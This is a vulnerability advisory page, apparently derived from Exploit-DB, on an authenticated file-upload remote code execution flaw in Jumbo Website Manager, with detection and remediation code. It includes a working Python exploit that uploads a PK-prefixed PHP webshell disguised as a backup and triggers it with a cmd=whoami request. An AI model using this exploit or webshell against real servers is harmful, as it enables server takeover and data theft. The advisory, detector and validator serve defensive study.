[webapps] Jumbo Website Manager - Remote Code Execution

No CVE assigned

Jumbo Website Manager contains a remote code execution vulnerability: an attacker holding administrator credentials can upload a malicious file and execute arbitrary code on the server.

Critical · CVSS 9.0

📋 Basic Vulnerability Information

CVE: Not assigned
Vulnerability type: Remote Code Execution (RCE)
Affected versions: Jumbo Website Manager (no specific version number given; inferred from the description to be all versions)
Severity: Critical · CVSS 9.0
Published: 2026-04-09
Submitted by: Mirabbas Ağalarov
Source: Exploit-DB (original post)

🔬 Root Cause

The application lets an administrator upload arbitrary files through its file-upload feature, stores the uploaded files in a web-accessible directory, and performs no effective validation of file type or content. An attacker can therefore upload a PHP file containing malicious code and execute it simply by requesting it.

🎯 Attack Scenario

1. The attacker obtains or guesses administrator credentials (e.g. through weak passwords, brute force or social engineering).
2. Logs into the admin backend with the administrator account.
3. Navigates to a file-upload feature (e.g. media manager, theme/plugin upload).
4. Uploads a file containing malicious PHP code (e.g. webshell.php).
5. Determines the uploaded file's path on the server (usually inferable from the response or from the usual directory layout).
6. Requests that file's URL directly with a browser or tool, triggering execution of the malicious code.
7. Success indicator: the attacker can run system commands, read sensitive files or gain control of the server.
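As an added defensive illustration (not part of the original advisory or of the project's code), the following Python sweeps web-server access logs for the upload-then-execute sequence described above, using the backup-manager paths that appear in this page's PoC; the log lines are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Paths taken from the PoC on this page; SAMPLE_LOG below is constructed.
UPLOAD_ENDPOINT = "/jumbo_files/jumbo/backupmanager/fileupload/php.php"
UPLOAD_DIR = "/jumbo_files/jumbo/backupmanager/fileupload/uploads/"
SCRIPT_RE = re.compile(r"\.(php\d?|phar|phtml)(\?|$)", re.IGNORECASE)
# Apache/Nginx "combined" access-log format: ip ident user [ts] "req" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
)

def find_upload_rce(lines: List[str]) -> List[Tuple[str, str, bool]]:
    """Return (ip, path, uploaded_first) for every request that fetches a
    script-looking file, or anything carrying a cmd= parameter, from the
    backup-manager upload directory. uploaded_first records whether the same
    client POSTed to the upload endpoint earlier in the log: that sequence is
    the PoC's exact shape, while an admin restoring a .jbox backup never
    fetches files from the upload directory at all."""
    uploaders: Dict[str, str] = {}
    hits: List[Tuple[str, str, bool]] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than abort the sweep
        ip, method, path = m["ip"], m["method"], m["path"]
        if method == "POST" and path.split("?", 1)[0] == UPLOAD_ENDPOINT:
            uploaders[ip] = m["ts"]
        elif path.startswith(UPLOAD_DIR) and (SCRIPT_RE.search(path) or "cmd=" in path):
            hits.append((ip, path, ip in uploaders))
    return hits

SAMPLE_LOG = [
    '198.51.100.7 - - [09/Apr/2026:09:58:11 +0000] "POST /jumbo_files/jumbo/backupmanager/fileupload/php.php?qqfile=site.jbox HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [09/Apr/2026:09:58:20 +0000] "GET /jumbo_files/jumbo/backupmanager/loadbackup.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [09/Apr/2026:10:01:02 +0000] "POST /jumbo_files/jumbo/backupmanager/fileupload/php.php?qqfile=test123.phar HTTP/1.1" 200 61 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [09/Apr/2026:10:01:09 +0000] "GET /jumbo_files/jumbo/backupmanager/fileupload/uploads/backup.phar?cmd=whoami HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, uploaded_first in find_upload_rce(SAMPLE_LOG):
        print(f"ALERT script fetched from upload dir by {ip} (uploaded first: {uploaded_first}): {path}")
```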

💥 Impact

Arbitrary code execution: the attacker can take full control of the server, leading to data theft, website defacement, planted backdoors, lateral movement and other severe consequences.

⚔️ Original PoC

The original post omits the PoC code, but the typical attack steps can be inferred from the title and description: upload a PHP file containing `system($_GET['cmd'])` through the form, then request the uploaded file's URL with a cmd parameter to execute commands.

```python
#Exploit Title: Jumbo Website Manager - Remote Code Execution
#Application: Jumbo Website Manager
#Version: v1.3.7
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://sourceforge.net/projects/jumbo/
#Software Link: https://sourceforge.net/projects/jumbo/
#Date of found: 28.10.2025
#Author: Mirabbas Ağalarov
#Tested on: Linux
import requests
from typing import Tuple


class JumboCMSExploit:
    def __init__(self, base_url: str = "http://localhost"):
        self.base_url = base_url
        self.session = requests.Session()

    def login(self, username: str, password: str) -> bool:
        """
        Login to Jumbo CMS
        Args:
            username: Username
            password: Password (already hashed)
        Returns:
            True if login successful, False otherwise
        """
        print(f"[*] Attempting login as: {username}")
        url = f"{self.base_url}/jumbo_files/jumbo/p_login.php"
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0",
            "Content-Type": "application/x-www-form-urlencoded",
            "Origin": self.base_url,
            "Referer": f"{self.base_url}/jumbo_files/jumbo/loginpage.php",
        }
        data = {
            "username": username,
            "password": password
        }
        response = self.session.post(url, headers=headers, data=data, allow_redirects=False)
        if response.status_code in [200, 302]:
            print(f"[+] Login successful! Status: {response.status_code}")
            print(f"[+] Cookies: {self.session.cookies.get_dict()}")
            return True
        else:
            print(f"[-] Login failed! Status: {response.status_code}")
            return False

    def upload_file(self, filename: str, content: bytes) -> Tuple[bool, str]:
        """
        Upload a file to the backup manager
        Args:
            filename: Name of file to upload (e.g., test.phar)
            content: Binary content of the file
        Returns:
            Tuple of (success, response_text)
        """
        print(f"[*] Uploading file: {filename}")
        url = f"{self.base_url}/jumbo_files/jumbo/backupmanager/fileupload/php.php"
        params = {"qqfile": filename}
        # Disguise .phar as .jbox
        display_name = filename.replace('.phar', '.jbox')
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0",
            "Accept": "*/*",
            "X-Requested-With": "XMLHttpRequest",
            "X-File-Name": display_name,
            "Content-Type": "application/octet-stream",
            "Origin": self.base_url,
            "Referer": f"{self.base_url}/jumbo_files/jumbo/backupmanager/loadbackup.php",
        }
        response = self.session.post(url, params=params, headers=headers, data=content)
        if response.status_code == 200:
            print(f"[+] Upload successful!")
            print(f"[+] Response: {response.text}")
            return True, response.text
        else:
            print(f"[-] Upload failed! Status: {response.status_code}")
            return False, response.text

    def exploit(self, username: str, password: str, filename: str, php_code: str) -> bool:
        """
        Complete exploit: Login + Upload
        Args:
            username: Login username
            password: Login password (hashed)
            filename: Filename to upload
            php_code: PHP code to execute
        Returns:
            True if exploit successful
        """
        # Step 1: Login
        if not self.login(username, password):
            print("[-] Exploit failed at login stage")
            return False
        # Step 2: Create malicious file content
        # PK header to disguise as archive
        file_content = b'PK\x03\x04\x0a\x00\x00\x00\x00\x00' + php_code.encode()
        # Step 3: Upload
        success, response = self.upload_file(filename, file_content)
        if success:
            print("\n[+] Exploit completed successfully!")
            uploaded_path = f"{self.base_url}/jumbo_files/jumbo/backupmanager/fileupload/uploads/backup.phar?cmd=whoami"
            print(f"[+] File possibly uploaded to: {uploaded_path}")
            return True
        else:
            print("[-] Exploit failed at upload stage")
            return False


if __name__ == "__main__":
    print("=" * 70)
    print("Jumbo CMS Authenticated RCE via File Upload Exploit")
    print("=" * 70)
    print()
    # Configuration
    TARGET = "http://localhost"
    USERNAME = "admin"
    PASSWORD = "6f7303f028531527b2da3620ccaf25ee384ae7db"
    FILENAME = "test123.phar"
    PHP_CODE = '<?php echo system($_GET["cmd"]);?>'
    # Run exploit
    exploit = JumboCMSExploit(TARGET)
    exploit.exploit(USERNAME, PASSWORD, FILENAME, PHP_CODE)
```

🛡️ Remediation

1. Until an official patch is released, restrict uploads to the required safe types only (images, PDF, etc.) using an allow-list.
2. Store uploaded files outside the web root and serve them through a separate subdomain or URL rewriting so they cannot be executed directly.
3. Inspect uploaded file content (e.g. verify a valid image/EXIF header) or scan it in a sandbox.
4. Enforce strong administrator passwords and enable multi-factor authentication.
5. Remove script-execution permission from the upload directory (e.g. .htaccess or Nginx rules that disable PHP execution).
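Added example, not the project's own code: a Python validator implementing items 1 to 3 and 5 above for the backup-manager upload shown in this page's PoC. It assumes the backup format is `.jbox` and that the client's file name arrives via the `qqfile` parameter and the `X-File-Name` header (both taken from the PoC); `STORAGE_DIR` is an assumed location outside the web root.

```python
import io
import os
import secrets
import zipfile
from typing import Tuple

# Constructed policy: only the manager's own .jbox archives (the extension the
# PoC hides behind) are accepted; STORAGE_DIR is assumed outside the web root.
ALLOWED_EXTENSIONS = {".jbox"}
SCRIPT_EXTENSIONS = {".php", ".php3", ".php5", ".phtml", ".phar", ".phps"}
STORAGE_DIR = "/var/lib/jumbo/backups"

def _ext(name: str) -> str:
    return os.path.splitext(os.path.basename(name))[1].lower()

def validate_backup_upload(qqfile: str, x_file_name: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason); run before anything is written to disk."""
    # The PoC sends test123.phar in qqfile but test123.jbox in X-File-Name;
    # a server that trusts only one of them is misled, so require agreement.
    if os.path.basename(qqfile) != os.path.basename(x_file_name):
        return False, "filename mismatch between qqfile and X-File-Name"
    ext = _ext(qqfile)
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext!r} not in allow-list"
    # A bare PK\x03\x04 prefix is not an archive: zipfile needs a real
    # end-of-central-directory record, so "PK header + PHP" fails here.
    if not zipfile.is_zipfile(io.BytesIO(content)):
        return False, "content is not a valid zip archive"
    # Members must not escape the restore directory or carry script extensions.
    with zipfile.ZipFile(io.BytesIO(content)) as zf:
        for member in zf.namelist():
            if member.startswith("/") or ".." in member.split("/"):
                return False, f"unsafe member path {member!r}"
            if _ext(member) in SCRIPT_EXTENSIONS:
                return False, f"archive contains script file {member!r}"
    return True, "ok"

def storage_path_for() -> str:
    """Random server-chosen name with a fixed extension, outside the web root:
    nothing the client controls ends up in a URL the server would execute."""
    return os.path.join(STORAGE_DIR, secrets.token_hex(16) + ".jbox")

def make_zip(files: dict) -> bytes:
    """Build a constructed in-memory archive for exercising the validator."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()
```

Pair this with a web-server rule that denies PHP execution under the upload directory (item 5), so the validator is not the only line of defence.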


⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-09 17:56 | Source: Exploit-DB
